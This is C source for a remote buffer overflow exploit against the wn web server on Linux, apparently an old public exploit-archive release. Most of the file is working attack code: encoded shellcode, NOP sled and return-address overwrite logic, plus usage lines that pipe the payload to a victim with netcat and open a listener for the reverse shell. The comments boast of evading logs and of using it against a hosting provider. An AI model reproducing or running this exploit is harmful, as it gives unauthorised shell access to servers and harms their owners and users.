/*
 * USE AT YOUR OWN RISK, BY USING THIS PROGRAM YOU ACCEPT ALL
 * RESPONSIBILITY FOR THE RESULTS
 */
/*
 * Bug discovered by:  Dvorak (dvorak@hit2000.org)
 * Exploit by:         Dvorak (dvorak@synnergy.net)
 * With help from:     Bounce (is that your official nick?)
 * Will work against:  wn webserver under Linux.
 * Exploit build at:   CCC (chaos communication camp, www.ccc.de)
 * Exploit first used: Hit2000 (www.hit2000.org)
 *
 * (against a dutch hosting provider to show it was possible)
 * I got a t-shirt from them; great marketing trick ;)
 *
 * Greets to: Hit2000 Crew (www.hit2000.org)
 *          : Synnergy Networks (www.synnergy.net)
 *          : emphyrio (wanneer ga je weer meer met security doen?)
 *          : shevek   (Building a remote AIX (4.3.2) ftpd exploit rocks!)
 *          : bivak    (niet chatten, leren!!)
 *          : #hit2000, #synnergy, #phreak.nl (irc.xs4all.nl)
 *
 *
 * New version of wn-server: hopf.math.nwu.edu 
 *
 * Check these sites out:
 *    www.hackernews.com
 *    www.securityfocus.com
 *    www.l0pht.com         
 */

/*
 * Remote exploit against the wn webserver 
 * (2.0.x, x < 9?)
 * (1.*)
 * (2.1.y, y < ?????)
 * The bug (ab)used is patcht in the newest versions
 *
 * John(@matht.nwu.edu), thanks for the quick response
 */

/*
 * This exploit leaves NO traces in the logs
 * It will cast a shell with uid = uid of webserver (nobody typical)
 * to the ip-address specified with the -d option port 14640
 * so you'd better be listening there (use netcat (nc) it is absolutly
 * the number 1 networking tool, ok fragrouter and nmap are cool too)
 */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

/*
 * This is weird shellcode. Its normal shellcode which had every byte
 * split into 2 pieces which were or-ed with 0x80 to maken sure the
 * whole range of bits was allowed by wn.
 *
 * The scrambled shellcode is highly ineffecient, it can be cut down
 * to approximatly 30% of its current size of you want to do it:
 * Do IT
 *
 * For more info and tools: dvorak@hit2000.org, dvorak@synnergy.net
 */

char shellcode[] = 
"\xeb\x2c\x5f\x89\xfe\x31\xc9\x89\xcb\x80\xc1\x01\x89\xcd\x89\xd9\x80\xc1\xff"
"\x90\x90\x8a\x34\x1e\x01\xee\x8a\x14\x1e\x01\xee\xc0\xe2\x04\x66\xc1\xfa\x04"
"\x88\x17\x01\xef\xe2\xe9\xeb\x05\xe8\xcf\xff\xff\xff\x83\x81\x8d\x8b\x88\x89"
"\x8d\x88\x80\x84\x86\x86\x88\x80\x8c\x83\x80\x81\x88\x89\x8d\x89\x88\x89"
"\x8c\x8a\x8e\x8b\x84\x81\x85\x8e\x88\x89\x84\x8e\x80\x88\x88\x80\x8c\x81"
"\x80\x81\x88\x89\x84\x8e\x80\x84\x88\x80\x8c\x81\x80\x84\x88\x89\x84\x8e"
"\x80\x8c\x88\x8d\x84\x8e\x80\x84\x8c\x8d\x88\x80\x88\x89\x80\x86\x83\x81"
"\x8c\x89\x88\x80\x8c\x81\x80\x82\x86\x86\x88\x89\x84\x8e\x80\x8c\x86\x86"
"\x88\x89\x84\x8e\x80\x8e\x88\x80\x8c\x81\x80\x8e\x86\x86\x88\x89\x84\x8e"
"\x80\x88\x86\x86\x8b\x89\x83\x89\x83\x80\x86\x86\x88\x89\x84\x8e\x80\x8e"
"\x88\x8d\x84\x86\x80\x8c\x88\x89\x84\x86\x80\x84\x83\x81\x8c\x89\x8b\x81"
"\x80\x83\x88\x89\x8c\x8a\x8e\x8b\x80\x82\x8e\x8b\x84\x89\x88\x89\x8c\x8b"
"\x88\x89\x8f\x81\x83\x81\x8c\x80\x80\x84\x86\x86\x8c\x8d\x88\x80\x83\x81"
"\x8c\x80\x88\x89\x8c\x81\x80\x84\x83\x8f\x88\x89\x8c\x82\x88\x8b\x81\x8e"
"\x8c\x8d\x88\x80\x88\x89\x8d\x80\x88\x80\x8c\x81\x80\x81\x8c\x8d\x88\x80"
"\x88\x89\x8d\x80\x88\x80\x8c\x81\x80\x81\x8c\x8d\x88\x80\x83\x81\x8c\x80"
"\x88\x89\x84\x86\x81\x80\x88\x88\x84\x86\x81\x8b\x88\x8d\x84\x86\x81\x84"
"\x88\x89\x84\x86\x80\x8c\x83\x81\x8c\x80\x80\x84\x80\x8b\x88\x8d\x85\x8e"
"\x81\x84\x88\x8d\x84\x8e\x80\x8c\x88\x8d\x85\x86\x81\x80\x8c\x8d\x88\x80"
"\x83\x81\x8c\x80\x84\x80\x88\x89\x8c\x83\x84\x83\x8c\x8d\x88\x80\x8e\x88"
"\x86\x8f\x8f\x8f\x8f\x8f\x8f\x8f\x82\x8e\x86\x81\x86\x81\x86\x81\x86\x81"
"\x86\x81\x86\x81\x86\x81\x86\x81\x86\x81\x86\x81\x86\x81\x86\x81\x86\x81"
"\x83\x89\x83\x80\x99\x99\x99\x99\x99\x99\x99\x99\x82\x8f\x86\x82\x86\x89"
"\x86\x8e\x82\x8f\x87\x83\x86\x88";

/*
 * Most of the hardcoded values here can be changed on the command line
 * but KNOW what you are doing or you will leave traces of your
 * activity in the log files
 */

void main(int argc, char *argv[]) 
{ 
    int num_amps = 520;           /* Number of &'s to use. iIf you read
                                   * the source of wn you'll know the
                                   * reason for this
                                   */
    int post_nops = 20;
    int num_nops = 400;
    int align = 0;
    int ret = 0xbffe5dd4;
    unsigned long my_addr = 0;
    int i, shl_len;
    char opt;

    while ((opt = getopt(argc, argv, "n:a:R:d:h")) != EOF)
        switch (opt)
        {
            case 'd':
                my_addr =  (inet_addr(optarg));
                break;
            case 'a':
                align = atoi(optarg);
                break;
            case 'R':
                ret = strtoul(optarg, NULL, 0);
                break;
            case 'n':
                num_nops = atoi(optarg);
                break;
            default:
                fprintf(stderr, "Use: wn_exploit -d <the ip  of the listening nc> | nc -v victim 80\n");
                fprintf(stderr, "on the listening host: nc -v -s <seem ip as above> -l -p 14640\n");
                fprintf(stderr, "Extended use:\n");
                fprintf(stderr, "\t -R 0xaddr\treturn address to use\n");
                fprintf(stderr, "\t if you want to tweak more:\n");
                fprintf(stderr, "\t read the source of wn_exploit of mail me.\n");
                fprintf(stderr, "\t dvorak@hit2000.org // dvorak@synnergy.net\n");
                exit(2);
        }

    if (!my_addr) {
        fprintf(stderr, "Hmm lets see what does system(\"rm -rf / & \") do to your machine?\n");
        fprintf(stderr, "\n\nShut The Fuck Up You Stupid Looser (STFUYSL)\n");
        exit(0);
    }

    fprintf(stderr, "wn remote exploit by dvorak(@hit2000.org // @synnergy.net)\n");
    
    printf("GET /s=c?");
    for (i = 0; i < num_amps; i++) printf("&");

    shl_len = 0;
    while (shellcode[shl_len])
       if (shellcode[shl_len] == '\x99') {
           printf("%c", 0x80 + ((my_addr & 0xf0) >> 4));
           printf("%c", 0x80 + (my_addr & 0x0f));
           my_addr >>= 8;
           shl_len += 2;
       } else
           printf("%c", shellcode[shl_len++]);

    /*
     * Thats correct, we place the nops AFTER the shellcode 
     * and add a jmp instruction after the nops which makes a
     * relative jump back to the shellcode
     *
     * Want to know why? mail me.
     */
    num_nops = 4104 - 4 - (5*num_amps) - shl_len - 5 - post_nops; 
    for (i = 0; i < num_nops; i++) printf("%c", 0x90);

    i = -(shl_len + num_nops + 5);
    printf("%c", 0xe9);
    printf("%c", (i & 0xff));
    printf("%c", (i >> 8) & 0xff);
    printf("%c", (i >> 16) &0xff);
    printf("%c", (i >> 24) & 0xff);

    /*
     * post_nops are required because else the jmp instruction added
     * above are overwritten by stack operations in the wn daemon
     */
    for (i = 0; i < post_nops; i++) printf("%c", 0x90);
    for (i = 0; i < align; i++) printf("q");
    printf("%c%c%c%c", ret & 0xff, (ret >> 8) &0xff, 
          (ret >> 16) & 0xff, (ret >> 24) & 0xff);
    printf("\r\n\r\n");
    fflush(stdout);
}
/*                    www.hack.co.za           [20 July]*/
